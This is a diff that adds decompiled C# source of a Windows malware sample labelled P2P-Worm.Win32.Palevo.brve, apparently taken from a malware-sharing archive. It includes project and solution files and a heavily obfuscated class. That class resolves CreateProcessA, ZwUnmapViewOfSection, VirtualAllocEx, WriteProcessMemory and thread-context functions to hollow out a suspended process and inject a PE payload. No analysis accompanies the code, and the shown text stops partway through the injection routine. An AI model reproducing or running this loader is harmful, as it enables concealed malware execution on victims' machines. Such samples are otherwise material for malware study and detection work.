+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
+    ref IntPtr TLPRASCREDENTIALSA,
+    long @bool);
+
+  [DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadConsole(
+    long hConsoleInput,
+    ref long lpBuffer,
+    long nNumberOfCharsToRead,
+    ref long lpNumberOfCharsRead,
+    ref long lpReserved);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadEncryptedFileRaw(
+    ref IntPtr pfExportCallback,
+    ref long pvCallbackContext,
+    ref long pvContext);
+
+  [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadPrinter(
+    long hPrinter,
+    ref long pBuf,
+    long cdBuf,
+    ref long pNoBytesRead);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReleaseSemaphore(
+    long hSemaphore,
+    long lReleaseCount,
+    ref long lpPreviousCount);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
+
+  [DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long GetStringTypeEx(
+    long Locale,
+    long dwInfoType,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
+    long cchSrc,
+    ref int lpCharType);
+
+  [DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long GetVolumePathName(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
+    long cchBufferLength);
+
+  [DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern IntPtr ToAscii(
+    long uVirtKey,
+    long uScanCode,
+    ref byte lpbKeyState,
+    ref long lpwTransKey,
+    long fuState);
+
+  private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
+
+  public struct Context
+  {
+    public uint II69TOHMUR;
+    public uint d2;
+    public uint das;
+    public uint d9;
+    public uint ad;
+    public uint dsa;
+    public uint ds;
+    public buffy.Save Save;
+    public uint dh;
+    public uint sad;
+    public uint da;
+    public uint MD;
+    public uint RD;
+    public uint mSI;
+    public uint WDA;
+    public uint AD3;
+    public uint D21;
+    public uint AS4;
+    public uint K32;
+    public uint F2W;
+    public uint HHJ;
+    public uint ADF5;
+    public uint GSSA;
+    public uint DSAAA;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
+    public byte[] er6rgdr65;
+  }
+
+  public struct Save
+  {
+    public uint KD7JX2MXT;
+    public uint JCNS3ZPSXO;
+    public uint DAS3;
+    public uint DAS23;
+    public uint ADSA;
+    public uint DAF35;
+    public uint FA32D;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
+    public byte[] FSDRF43;
+    public uint FA32QA;
+  }
+
+  public struct Misc
+  {
+    public uint SDUHRL;
+    public uint GSIJ;
+  }
+
+  public struct Section_Header
+  {
+    public byte FSDPOU4PO3;
+    public buffy.Misc Mi2sc;
+    public uint AL8ZCRFWNU;
+    public uint DA22S3;
+    public uint PoinEEter;
+    public uint E2Q4RS;
+    public uint FS523QF;
+    public uint FSB43FSD4;
+    public uint QBFAS4E;
+    public uint AS32QFZS;
+  }
+
+  public struct Process_Information
+  {
+    public IntPtr DAS4QQW;
+    public IntPtr RFSER;
+    public int TGJWE;
+    public int SDFFFFFFFFFF;
+  }
+
+  [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+  public struct Startup_Information
+  {
+    public int CSZE;
+    public string FSDR4G;
+    public string AAAAAAAAAA;
+    public string AADDDDDDD;
+    public int ADA;
+    public int C;
+    public int AEDS;
+    public int DASDDDD;
+    public int XASE4;
+    public int DAS3EDFZ;
+    public int DVA3ES;
+    public int CCCCQ;
+    public short FDSRS;
+    public short VYE5X;
+    public int KHJKIHJK;
+    public int KHJKHJK;
+    public int KHJKHJ;
+    public int KHJKJHK;
+  }
+
+  public struct Security_Flags
+  {
+    public int GFSETWE;
+    public IntPtr EWEWWW;
+    public int DASDAS;
+  }
+
+  public struct DOS_Header
+  {
+    public ushort DASDASFASF;
+    public ushort QWEQWE;
+    public ushort EQWEQWEQWE;
+    public ushort HFGHFGHFGH;
+    public ushort HFGHFGHFG;
+    public ushort DASD444444;
+    public ushort DASFASE33;
+    public ushort DASKGHJ;
+    public ushort DASVZDF;
+    public ushort VXCVXC;
+    public ushort VXCVXCV;
+    public ushort EWECS;
+    public ushort EWADC;
+    public ushort UADA3;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
+    public ushort[] ReservWWWWWWWWWWWWWWWedA;
+    public ushort DAS4E;
+    public ushort UJJ;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
+    public ushort[] DDDDDDDDD;
+    public int DASE3ASDAS;
+  }
+
+  public struct NT_Headers
+  {
+    public uint SSSSSSSSSSSQ;
+    public buffy.File_Header DSEEEEE;
+    public buffy.Optional_Headers OOOU;
+  }
+
+  public struct File_Header
+  {
+    public ushort ITTTTTTTT;
+    public ushort DAAAAAAAA3;
+    public uint HRFTYTYTR;
+    public uint GJGFSFS;
+    public uint FSVGY;
+    public ushort FSFV;
+    public ushort A34FFC;
+  }
+
+  public struct Optional_Headers
+  {
+    public ushort WWWWWWWWW;
+    public byte MaAAAAAAAAAAAjor;
+    public byte MiSSSSSSSSSSSnor;
+    public uint SSSSSSSSSSSSS;
+    public uint FFFFFFFFFFF;
+    public uint XXXXXXXX;
+    public uint DDDDDDDDAAA;
+    public uint FSSSSSSS;
+    public uint RSFS43;
+    public uint DFAZDASD;
+    public uint SectionA;
+    public uint FileA;
+    public ushort GDFTDFFFF;
+    public ushort HGDFHD564;
+    public ushort GD5ERGD;
+    public ushort FSD5YHD;
+    public ushort ASDASG;
+    public ushort AS4ASAS;
+    public uint CCC;
+    public uint DASRDASRASR;
+    public uint WQDASDASD;
+    public uint Assssssss;
+    public ushort fsd4s;
+    public ushort fjio;
+    public uint dasrlajstpoi;
+    public uint dasdraskyjhuasp;
+    public uint SHRedas4wa9uqserve;
+    public uint fsdtsysyt;
+    public uint eawdasdas3;
+    public uint Cocccunt;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
+    public buffy.Data_Directory[] GSDGSDT4;
+  }
+
+  public struct Data_Directory
+  {
+    public uint ewq34q234;
+    public uint das34aw33;
+  }
+
+  public delegate bool GN04L0ER8I(
+    string ASFASE3,
+    string DASDAS3E2,
+    ref buffy.Security_Flags DASCASE,
+    ref buffy.Security_Flags CASE222,
+    bool DAS432E,
+    uint AEDFKJK32,
+    IntPtr DSA43R3W,
+    string ase32ew,
+    [In] ref buffy.Startup_Information das43fsa,
+    out buffy.Process_Information das3);
+
+  public delegate bool ZGOQ8VM05M(
+    IntPtr DASE32,
+    int AL8ZCRFWNU,
+    byte[] DSAE32,
+    int DASEADAS,
+    out int ASD43FA);
+
+  public delegate int Q7QRRP639W(
+    IntPtr FASFDASDAS,
+    int AL8ZCRFWNU,
+    ref int CAS32,
+    int ASDASC,
+    ref int CASTWE);
+
+  public delegate IntPtr W6CTR6GLCC(
+    IntPtr DASE43E,
+    int AL8ZCRFWNU,
+    uint DASCAS3,
+    uint DAS3,
+    uint DAS32);
+
+  public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
+
+  public delegate uint WS2XVBNVO9(IntPtr DASEAS);
+
+  public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
+
+  public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyApplication.cs

@@ -0,0 +1,18 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyApplication
+// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
+
+using Microsoft.VisualBasic.ApplicationServices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+
+namespace My
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class MyApplication : ApplicationBase
+  {
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyComputer.cs

@@ -0,0 +1,24 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyComputer
+// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
+
+using Microsoft.VisualBasic.Devices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+
+namespace My
+{
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  internal class MyComputer : Computer
+  {
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [DebuggerHidden]
+    public MyComputer()
+    {
+    }
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyProject.cs

@@ -0,0 +1,108 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyProject
+// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.ApplicationServices;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.ComponentModel.Design;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace My
+{
+  [HideModuleName]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [StandardModule]
+  internal sealed class MyProject
+  {
+    private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
+    private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
+
+    [HelpKeyword("My.Computer")]
+    internal static MyComputer Computer
+    {
+      [DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.Application")]
+    internal static MyApplication Application
+    {
+      [DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.User")]
+    internal static User User
+    {
+      [DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.WebServices")]
+    internal static MyProject.MyWebServices WebServices
+    {
+      [DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
+    internal sealed class MyWebServices
+    {
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public override int GetHashCode() => base.GetHashCode();
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      internal new Type GetType() => typeof (MyProject.MyWebServices);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public override string ToString() => base.ToString();
+
+      [DebuggerHidden]
+      private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
+
+      [DebuggerHidden]
+      private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public MyWebServices()
+      {
+      }
+    }
+
+    [ComVisible(false)]
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    internal sealed class ThreadSafeObjectProvider<T> where T : new()
+    {
+      internal T GetInstance
+      {
+        [DebuggerHidden] get
+        {
+          if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
+            MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
+          return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
+        }
+      }
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public ThreadSafeObjectProvider()
+      {
+      }
+    }
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/P2P-Worm.Win32.Palevo.brve.csproj

@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>cfncfn</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+    <RootNamespace>My</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="pizde.cs" />
+    <Compile Include="buffy.cs" />
+    <Compile Include="MyApplication.cs" />
+    <Compile Include="MyComputer.cs" />
+    <Compile Include="MyProject.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/P2P-Worm.Win32.Palevo.brve.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "cfncfn", "P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.csproj", "{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/buffy.cs

@@ -0,0 +1,632 @@
+// Decompiled with JetBrains decompiler
+// Type: buffy
+// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+public class buffy
+{
+  public const long ASDFASFASF = 2778;
+  public const long FASFASFASF = 60116;
+  public const long AFSFASFASCFC = 218;
+  public const long ASDASCASDASD = 218;
+  public const long BVCXBXCBXCB = 218;
+  public const long BXCBXCBXCB = 253;
+  public const long FSDR3FSF = 218;
+  public const long KKKKKKKKKDDDDDDD = 17247;
+  public const uint FSSSSSSSSSSSSSSSSSS = 218;
+
+  public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
+  {
+    object Instance1 = (object) new buffy.Context();
+    object obj1 = (object) new buffy.Process_Information();
+    object obj2 = (object) new buffy.Startup_Information();
+    object obj3 = (object) new buffy.Security_Flags();
+    object obj4 = (object) new buffy.Security_Flags();
+    object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
+    int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
+    buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
+    Type Type = typeof (Marshal);
+    object[] objArray1 = new object[2];
+    object[] objArray2 = objArray1;
+    object Instance3 = Instance2;
+    object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
+    objArray2[0] = objectValue;
+    objArray1[1] = (object) dosHeader1.GetType();
+    object[] objArray3 = objArray1;
+    object[] Arguments = objArray3;
+    bool[] flagArray = new bool[2]{ true, false };
+    bool[] CopyBack = flagArray;
+    object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
+    if (flagArray[0])
+      NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
+      {
+        RuntimeHelpers.GetObjectValue(objArray3[0])
+      }, (string[]) null, (Type[]) null, true, false);
+    buffy.DOS_Header dosHeader2;
+    buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
+    NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
+    buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
+    buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
+    buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
+    buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
+    buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
+    buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
+    buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
+    buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
+    buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
+    string DASDAS3E2_1 = VVVVVVCAE;
+    object obj6 = obj3;
+    buffy.Security_Flags securityFlags1;
+    buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
+    ref buffy.Security_Flags local1 = ref securityFlags2;
+    object obj7 = obj4;
+    buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
+    ref buffy.Security_Flags local2 = ref securityFlags3;
+    IntPtr num1;
+    IntPtr DSA43R3W1 = num1;
+    object obj8 = obj2;
+    buffy.Startup_Information startupInformation1;
+    buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
+    ref buffy.Startup_Information local3 = ref startupInformation2;
+    object obj9 = obj1;
+    buffy.Process_Information processInformation1;
+    buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
+    ref buffy.Process_Information local4 = ref processInformation2;
+    int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
+    object obj10 = (object) processInformation2;
+    object Instance4 = (object) startupInformation2;
+    object obj11 = (object) securityFlags3;
+    object obj12 = (object) securityFlags2;
+    if (-((uint) num2 > 0U ? 1 : 0) == 0)
+      return;
+    buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
+    IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
+    object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
+    buffy.NT_Headers ntHeaders2;
+    buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
+    NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
+    {
+      (object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
+    }, (string[]) null, (Type[]) null);
+    NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
+    {
+      (object) 65539
+    }, (string[]) null, (Type[]) null);
+    if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
+      return;
+    buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
+    string DASDAS3E2_2 = VVVVVVCAE;
+    object obj13 = obj12;
+    securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
+    ref buffy.Security_Flags local5 = ref securityFlags2;
+    object obj14 = obj11;
+    securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
+    ref buffy.Security_Flags local6 = ref securityFlags3;
+    IntPtr DSA43R3W2 = num1;
+    object obj15 = Instance4;
+    startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
+    ref buffy.Startup_Information local7 = ref startupInformation2;
+    object obj16 = obj10;
+    processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
+    ref buffy.Process_Information local8 = ref processInformation2;
+    int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
+    object Instance5 = (object) processInformation2;
+    object obj17 = (object) startupInformation2;
+    object obj18 = (object) securityFlags3;
+    object obj19 = (object) securityFlags2;
+    if (-((uint) num3 > 0U ? 1 : 0) == 0)
+      return;
+    buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
+    object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
+    object obj21 = Instance1;
+    buffy.Context context1;
+    buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
+    ref buffy.Context local9 = ref context2;
+    int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
+    object Instance6 = (object) context2;
+    buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
+    object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
+    int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
+    long num5;
+    int num6 = checked ((int) num5);
+    ref int local10 = ref num6;
+    int num7 = 0;
+    ref int local11 = ref num7;
+    int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
+    long num9 = (long) num6;
+    buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
+    object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
+    int AL8ZCRFWNU1 = checked ((int) num9);
+    long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
+    buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
+    object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
+    int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
+    int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
+    uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
+    if (num11 == 0U)
+      return;
+    buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
+    object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
+    int AL8ZCRFWNU2 = checked ((int) num11);
+    byte[] DSAE32_1 = DAS4DA3;
+    int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
+    uint num12;
+    int num13 = checked ((int) num12);
+    ref int local12 = ref num13;
+    int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
+    uint num15 = checked ((uint) num13);
